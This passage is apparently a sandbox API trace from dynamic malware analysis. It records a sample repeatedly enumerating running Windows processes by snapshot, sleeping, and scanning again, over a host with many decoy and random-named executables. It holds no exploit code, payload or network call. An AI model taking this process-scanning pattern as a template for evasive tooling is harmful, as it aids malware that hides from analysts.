szExeFile="slopefirewall.exe")) returned 1 [0136.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0136.661] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0136.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0136.663] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0136.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0136.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0136.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0136.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0136.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0136.670] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0136.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0136.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0136.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0136.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0136.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0136.678] CloseHandle (hObject=0xc4) returned 1 [0136.678] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0136.683] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0136.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0136.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0136.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0136.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0136.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0136.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0136.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0136.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0136.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0136.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0136.739] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0136.742] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0136.743] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0136.744] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0136.746] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0136.747] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0136.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0136.749] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0136.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0136.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0136.753] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0136.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0136.755] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0136.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0136.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0136.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0136.760] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0136.761] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0136.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0136.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0136.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0136.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0136.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0136.780] CloseHandle (hObject=0xbc) returned 1 [0136.780] Sleep (dwMilliseconds=0x12c) [0137.130] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.136] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0137.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0137.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 